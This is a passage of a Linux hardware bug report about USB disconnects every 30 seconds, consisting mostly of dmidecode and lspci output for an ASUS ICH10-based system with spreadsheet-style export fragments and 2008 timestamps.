Mouse External Connector Type: PS/2 Port Type: Mouse Port Handle 0x000A, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: USB12 Internal Connector Type: None External Reference Designator: USB12 External Connector Type: Access Bus (USB) Port Type: USB Handle 0x000B, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: USB34 Internal Connector Type: None External Reference Designator: USB34 External Connector Type: Access Bus (USB) Port Type: USB Handle 0x000C, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: USB56 Internal Connector Type: None External Reference Designator: USB56 External Connector Type: Access Bus (USB) Port Type: USB Handle 0x000D, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: GbE LAN Internal Connector Type: None External Reference Designator: GbE LAN External Connector Type: RJ-45 Port Type: Network Port Handle 0x000E, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: COM 1 Internal Connector Type: None External Reference Designator: COM 1 External Connector Type: DB-9 male Port Type: Serial Port 16550A Compatible Handle 0x000F, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: SPDIF_OUT Internal Connector Type: None External Reference Designator: SPDIF_OUT External Connector Type: On Board Sound Input From CD-ROM Port Type: Audio Port Handle 0x0010, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: SPDIF_O1 Internal Connector Type: None External Reference Designator: SPDIF_O1 External Connector Type: On Board Sound Input From CD-ROM Port Type: Audio Port Handle 0x0011, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: Audio_Line In Internal Connector Type: None External Reference Designator: Audio_Line In External Connector Type: Mini Jack (headphones) Port Type: Audio Port Handle 0x0012, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: Audio_Line Out Internal Connector Type: None External Reference Designator: Audio_Line Out External Connector Type: Mini Jack (headphones) Port Type: Audio Port Handle 0x0013, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: Audio_Mic In Internal Connector Type: None External Reference Designator: Audio_Mic In External Connector Type: Mini Jack (headphones) Port Type: Audio Port Handle 0x0014, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: Audio_Center/LFE Internal Connector Type: None External Reference Designator: Audio_Center/LFE External Connector Type: Mini Jack (headphones) Port Type: Audio Port Handle 0x0015, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: Audio_Surround OUT Internal Connector Type: None External Reference Designator: Audio_Surround OUT External Connector Type: Mini Jack (headphones) Port Type: Audio Port Handle 0x0016, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: Audio_Surround Back Internal Connector Type: None External Reference Designator: Audio_Surround Back External Connector Type: Mini Jack (headphones) Port Type: Audio Port Handle 0x0017, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: SATA1 Internal Connector Type: SAS/SATA Plug Receptacle External Reference Designator: Not Specified External Connector Type: None Port Type: SATA Handle 0x0018, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: SATA2 Internal Connector Type: SAS/SATA Plug Receptacle External Reference Designator: Not Specified External Connector Type: None Port Type: SATA Handle 0x0019, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: SATA3 Internal Connector Type: SAS/SATA Plug Receptacle External Reference Designator: Not Specified External Connector Type: None Port Type: SATA Handle 0x001A, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: SATA4 Internal Connector Type: SAS/SATA Plug Receptacle External Reference Designator: Not Specified External Connector Type: None Port Type: SATA Handle 0x001B, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: SATA5 Internal Connector Type: SAS/SATA Plug Receptacle External Reference Designator: Not Specified External Connector Type: None Port Type: SATA Handle 0x001C, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: SATA6 Internal Connector Type: SAS/SATA Plug Receptacle External Reference Designator: Not Specified External Connector Type: None Port Type: SATA Handle 0x001D, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: PRI_EIDE Internal Connector Type: SAS/SATA Plug Receptacle External Reference Designator: Not Specified External Connector Type: None Port Type: SATA Handle 0x001E, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: USB78 Internal Connector Type: Access Bus (USB) External Reference Designator: Not Specified External Connector Type: None Port Type: USB Handle 0x001F, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: USB910 Internal Connector Type: Access Bus (USB) External Reference Designator: Not Specified External Connector Type: None Port Type: USB Handle 0x0020, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: USB1112 Internal Connector Type: Access Bus (USB) External Reference Designator: Not Specified External Connector Type: None Port Type: USB Handle 0x0021, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: FLOPPY Internal Connector Type: On Board Floppy External Reference Designator: Not Specified External Connector Type: None Port Type: Other Handle 0x0022, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: CD Internal Connector Type: On Board Sound Input From CD-ROM External Reference Designator: Not Specified External Connector Type: None Port Type: Audio Port Handle 0x0023, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: AAFP Internal Connector Type: Mini Jack (headphones) External Reference Designator: Not Specified External Connector Type: None Port Type: Audio Port Handle 0x0024, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: CPU_FAN Internal Connector Type: Other External Reference Designator: Not Specified External Connector Type: None Port Type: Other Handle 0x0025, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: PWR_FAN Internal Connector Type: Other External Reference Designator: Not Specified External Connector Type: None Port Type: Other Handle 0x0026, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: CHA_FAN Internal Connector Type: Other External Reference Designator: Not Specified External Connector Type: None Port Type: Other Handle 0x0027, DMI type 9, 13 bytes System Slot Information Designation: PCIEX16 Type: 32-bit PCI Express Current Usage: In Use Length: Short ID: 1 Characteristics: 3.3 V is provided Opening is shared PME signal is supported Handle 0x0028, DMI type 9, 13 bytes System Slot Information Designation: PCIEX1_1 Type: 64-bit PCI Express Current Usage: In Use Length: Short ID: 8 Characteristics: 3.3 V is provided Opening is shared PME signal is supported Handle 0x0029, DMI type 9, 13 bytes System Slot Information Designation: PCIEX1_2 Type: 32-bit PCI Express Current Usage: Available Length: Short ID: 9 Characteristics: 3.3 V is provided Opening is shared PME signal is supported Handle 0x002A, DMI type 9, 13 bytes System Slot Information Designation: PCI_1 Type: 32-bit PCI Current Usage: Available Length: Short ID: 2 Characteristics: 3.3 V is provided Opening is shared PME signal is supported Handle 0x002B, DMI type 9, 13 bytes System Slot Information Designation: PCI_2 Type: 32-bit PCI Current Usage: Available Length: Short ID: 3 Characteristics: 3.3 V is provided Opening is shared PME signal is supported Handle 0x002C, DMI type 9, 13 bytes System Slot Information Designation: PCI_3 Type: 32-bit PCI Current Usage: Available Length: Short ID: 4 Characteristics: 3.3 V is provided Opening is shared PME signal is supported Handle 0x002D, DMI type 10, 6 bytes On Board Device Information Type: Ethernet Status: Enabled Description: Onboard Ethernet Handle 0x002E, DMI type 11, 5 bytes OEM Strings String 1: 0022153B35C2 String 2: To Be Filled By O.E.M. String 3: To Be Filled By O.E.M. String 4: To Be Filled By O.E.M. Handle 0x002F, DMI type 12, 5 bytes System Configuration Options Option 1: To Be Filled By O.E.M. Handle 0x0030, DMI type 13, 22 bytes BIOS Language Information Installable Languages: 1 en|US|iso8859-1 Currently Installed Language: en|US|iso8859-1 Handle 0x0031, DMI type 15, 35 bytes System Event Log Area Length: 4 bytes Header Start Offset: 0x0000 Header Length: 2 bytes Data Start Offset: 0x0002 Access Method: Indexed I/O, one 16-bit index port, one 8-bit data port Access Address: Index 0x046A, Data 0x046C Status: Invalid, Not Full Change Token: 0x00000000 Header Format: No Header Supported Log Type Descriptors: 6 Descriptor 1: End of log Data Format 1: OEM-specific Descriptor 2: End of log Data Format 2: OEM-specific Descriptor 3: End of log Data Format 3: OEM-specific Descriptor 4: End of log Data Format 4: OEM-specific Descriptor 5: End of log Data Format 5: OEM-specific Descriptor 6: End of log Data Format 6: OEM-specific Handle 0x0032, DMI type 16, 15 bytes Physical Memory Array Location: System Board Or Motherboard Use: System Memory Error Correction Type: None Maximum Capacity: 16 GB Error Information Handle: Not Provided Number Of Devices: 4 Handle 0x0033, DMI type 19, 15 bytes Memory Array Mapped Address Starting Address: 0x00000000000 Ending Address: 0x0007FFFFFFF Range Size: 2 GB Physical Array Handle: 0x0032 Partition Width: 0 Handle 0x0034, DMI type 17, 27 bytes Memory Device Array Handle: 0x0032 Error Information Handle: Not Provided Total Width: 64 bits Data Width: 64 bits Size: 2048 MB Form Factor: DIMM Set: None Locator: DIMM0 Bank Locator: BANK0 Type: DDR Type Detail: Synchronous Speed: 800 MHz (1.2 ns) Manufacturer: Manufacturer0 Serial Number: SerNum0 Asset Tag: AssetTagNum0 Part Number: PartNum0 Handle 0x0035, DMI type 20, 19 bytes Memory Device Mapped Address Starting Address: 0x00000000000 Ending Address: 0x0007FFFFFFF Range Size: 2 GB Physical Device Handle: 0x0034 Memory Array Mapped Address Handle: 0x0033 Partition Row Position: 1 Interleaved Data Depth: 1 Handle 0x0036, DMI type 17, 27 bytes Memory Device Array Handle: 0x0032 Error Information Handle: Not Provided Total Width: Unknown Data Width: Unknown Size: No Module Installed Form Factor: DIMM Set: None Locator: DIMM1 Bank Locator: BANK1 Type: Unknown Type Detail: Unknown Speed: Unknown Manufacturer: Manufacturer1 Serial Number: SerNum1 Asset Tag: AssetTagNum1 Part Number: PartNum1 Handle 0x0037, DMI type 20, 19 bytes Memory Device Mapped Address Starting Address: 0x00000000000 Ending Address: 0x000000003FF Range Size: 1 kB Physical Device Handle: 0x0036 Memory Array Mapped Address Handle: 0x0033 Partition Row Position: 1 Interleaved Data Depth: 1 Handle 0x0038, DMI type 17, 27 bytes Memory Device Array Handle: 0x0032 Error Information Handle: Not Provided Total Width: Unknown Data Width: Unknown Size: No Module Installed Form Factor: DIMM Set: None Locator: DIMM2 Bank Locator: BANK2 Type: Unknown Type Detail: Unknown Speed: Unknown Manufacturer: Manufacturer2 Serial Number: SerNum2 Asset Tag: AssetTagNum2 Part Number: PartNum2 Handle 0x0039, DMI type 20, 19 bytes Memory Device Mapped Address Starting Address: 0x00000000000 Ending Address: 0x000000003FF Range Size: 1 kB Physical Device Handle: 0x0038 Memory Array Mapped Address Handle: 0x0033 Partition Row Position: 1 Interleaved Data Depth: 1 Handle 0x003A, DMI type 17, 27 bytes Memory Device Array Handle: 0x0032 Error Information Handle: Not Provided Total Width: Unknown Data Width: Unknown Size: No Module Installed Form Factor: DIMM Set: None Locator: DIMM3 Bank Locator: BANK3 Type: Unknown Type Detail: Unknown Speed: Unknown Manufacturer: Manufacturer3 Serial Number: SerNum3 Asset Tag: AssetTagNum3 Part Number: PartNum3 Handle 0x003B, DMI type 20, 19 bytes Memory Device Mapped Address Starting Address: 0x00000000000 Ending Address: 0x000000003FF Range Size: 1 kB Physical Device Handle: 0x003A Memory Array Mapped Address Handle: 0x0033 Partition Row Position: 1 Interleaved Data Depth: 1 Handle 0x003C, DMI type 32, 20 bytes System Boot Information Status: No errors detected Handle 0x003D, DMI type 127, 4 bytes End Of Table lspci -vvnn: 00:00.0 Host bridge [0600]: Intel Corporation Eaglelake DRAM Controller [8086:2e20] (rev 02) Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d3] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [e0] Vendor Specific Information 00:01.0 PCI bridge [0604]: Intel Corporation Eaglelake PCI Express Root Port [8086:2e21] (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 32 bytes Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: fea00000-feafffff Prefetchable memory behind bridge: 00000000d0000000-00000000dfffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [88] Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d3] Capabilities: [80] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [90] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable+ Address: fee0f00c Data: 41b9 Capabilities: [a0] Express Root Port (Slot+) IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;64ns, L1 &lt;1us Device: Errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- Device: MaxPayload 128 bytes, MaxReadReq 128 bytes Link: Supported Speed unknown, Width x16, ASPM L0s, Port 2 Link: Latency L0s &lt;256ns, L1 &lt;4us Link: ASPM Disabled RCB 64 bytes CommClk+ ExtSynch- Link: Speed unknown, Width x16 Slot: AtnBtn- PwrCtrl- MRL- AtnInd- PwrInd- HotPlug- Surpise- Slot: Number 0, PowerLimit 75.000000 Slot: Enabled AtnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- Slot: AttnInd Unknown, PwrInd Unknown, Power- Root: Correctable- Non-Fatal- Fatal- PME- 00:1a.0 USB Controller [0c03]: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #4 [8086:3a37] (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 4: I/O ports at c800 [size=32] Capabilities: [50] Vendor Specific Information 00:1a.1 USB Controller [0c03]: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #5 [8086:3a38] (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at c880 [size=32] Capabilities: [50] Vendor Specific Information 00:1a.2 USB Controller [0c03]: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #6 [8086:3a39] (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 20 Region 4: I/O ports at cc00 [size=32] Capabilities: [50] Vendor Specific Information 00:1a.7 USB Controller [0c03]: Intel Corporation 82801JI (ICH10 Family) USB2 EHCI Controller #2 [8086:3a3c] (prog-if 20 [EHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 20 Region 0: Memory at fe9ffc00 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port Capabilities: [98] Vendor Specific Information 00:1b.0 Audio device [0403]: Intel Corporation 82801JI (ICH10 Family) HD Audio Controller [8086:3a3e] Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82fe] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 22 Region 0: Memory at fe9f8000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [60] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [70] Express Unknown type IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;64ns, L1 &lt;1us Device: Errors: Correctable- Non-Fatal- Fatal- Unsupported- Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop+ Device: MaxPayload 128 bytes, MaxReadReq 128 bytes Link: Supported Speed unknown, Width x0, ASPM unknown, Port 0 Link: Latency L0s &lt;64ns, L1 &lt;1us Link: ASPM Disabled CommClk- ExtSynch- Link: Speed unknown, Width x0 00:1c.0 PCI bridge [0604]: Intel Corporation 82801JI (ICH10 Family) PCI Express Port 1 [8086:3a40] (prog-if 00 [Normal decode]) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 32 bytes Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 Prefetchable memory behind bridge: 00000000fdf00000-00000000fdffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Express Root Port (Slot+) IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;64ns, L1 &lt;1us Device: Errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- Device: MaxPayload 128 bytes, MaxReadReq 128 bytes Link: Supported Speed 2.5Gb/s, Width x1, ASPM L0s L1, Port 1 Link: Latency L0s &lt;256ns, L1 &lt;4us Link: ASPM Disabled RCB 64 bytes CommClk+ ExtSynch- Link: Speed 2.5Gb/s, Width x0 Slot: AtnBtn- PwrCtrl- MRL- AtnInd- PwrInd- HotPlug+ Surpise+ Slot: Number 0, PowerLimit 10.000000 Slot: Enabled AtnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- Slot: AttnInd Unknown, PwrInd Unknown, Power- Root: Correctable- Non-Fatal- Fatal- PME- Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable+ Address: fee0f00c Data: 41c1 Capabilities: [90] Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:1c.5 PCI bridge [0604]: Intel Corporation 82801JI (ICH10 Family) PCI Express Port 6 [8086:3a4a] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 32 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 0000e000-0000efff Memory behind bridge: feb00000-febfffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Express Root Port (Slot+) IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;64ns, L1 &lt;1us Device: Errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- Device: MaxPayload 128 bytes, MaxReadReq 128 bytes Link: Supported Speed 2.5Gb/s, Width x1, ASPM L0s L1, Port 6 Link: Latency L0s &lt;256ns, L1 &lt;4us Link: ASPM Disabled RCB 64 bytes CommClk+ ExtSynch- Link: Speed 2.5Gb/s, Width x1 Slot: AtnBtn- PwrCtrl- MRL- AtnInd- PwrInd- HotPlug+ Surpise+ Slot: Number 0, PowerLimit 10.000000 Slot: Enabled AtnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- Slot: AttnInd Unknown, PwrInd Unknown, Power- Root: Correctable- Non-Fatal- Fatal- PME- Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable+ Address: fee0f00c Data: 41c9 Capabilities: [90] Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:1d.0 USB Controller [0c03]: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #1 [8086:3a34] (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 21 Region 4: I/O ports at c080 [size=32] Capabilities: [50] Vendor Specific Information 00:1d.1 USB Controller [0c03]: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #2 [8086:3a35] (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 18 Region 4: I/O ports at c400 [size=32] Capabilities: [50] Vendor Specific Information 00:1d.2 USB Controller [0c03]: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #3 [8086:3a36] (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 20 Region 4: I/O ports at c480 [size=32] Capabilities: [50] Vendor Specific Information 00:1d.7 USB Controller [0c03]: Intel Corporation 82801JI (ICH10 Family) USB2 EHCI Controller #1 [8086:3a3a] (prog-if 20 [EHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 21 Region 0: Memory at fe9ff800 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port Capabilities: [98] Vendor Specific Information 00:1e.0 PCI bridge [0604]: Intel Corporation 82801 PCI Bridge [8086:244e] (rev 90) (prog-if 01 [Subtractive decode]) Control: I/O- Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=04, subordinate=04, sec-latency=32 Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [50] Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] 00:1f.0 ISA bridge [0601]: Intel Corporation 82801JIB (ICH10) LPC Interface Controller [8086:3a18] Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [e0] Vendor Specific Information 00:1f.2 IDE interface [0101]: Intel Corporation 82801JI (ICH10 Family) 4 port SATA IDE Controller [8086:3a20] (prog-if 8f [Master SecP SecO PriP PriO]) Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 18 Region 0: I/O ports at b000 [size=8] Region 1: I/O ports at ac00 [size=4] Region 2: I/O ports at a880 [size=8] Region 3: I/O ports at a800 [size=4] Region 4: I/O ports at a480 [size=16] Region 5: I/O ports at a400 [size=16] Capabilities: [70] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [b0] Vendor Specific Information 00:1f.3 SMBus [0c05]: Intel Corporation 82801JI (ICH10 Family) SMBus Controller [8086:3a30] Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 15 Region 0: Memory at fe9ff400 (64-bit, non-prefetchable) [size=256] Region 4: I/O ports at 0400 [size=32] 00:1f.5 IDE interface [0101]: Intel Corporation 82801JI (ICH10 Family) 2 port SATA IDE Controller [8086:3a26] (prog-if 85 [Master SecO PriO]) Subsystem: ASUSTeK Computer Inc. Unknown device [1043:82d4] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 18 Region 0: I/O ports at c000 [size=8] Region 1: I/O ports at bc00 [size=4] Region 2: I/O ports at b880 [size=8] Region 3: I/O ports at b800 [size=4] Region 4: I/O ports at b480 [size=16] Region 5: I/O ports at b400 [size=16] Capabilities: [70] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [b0] Vendor Specific Information 01:00.0 VGA compatible controller [0300]: ATI Technologies Inc Unknown device [1002:9442] (prog-if 00 [VGA controller]) Subsystem: ATI Technologies Inc Unknown device [1002:0502] </t>
  </si>
  <si>
    <t>USB disconnects every 30 seconds</t>
  </si>
  <si>
    <t>2008-10-04 10:49 UTC</t>
  </si>
  <si>
    <t>2008-10-05 15:23 UTC</t>
  </si>
  <si>
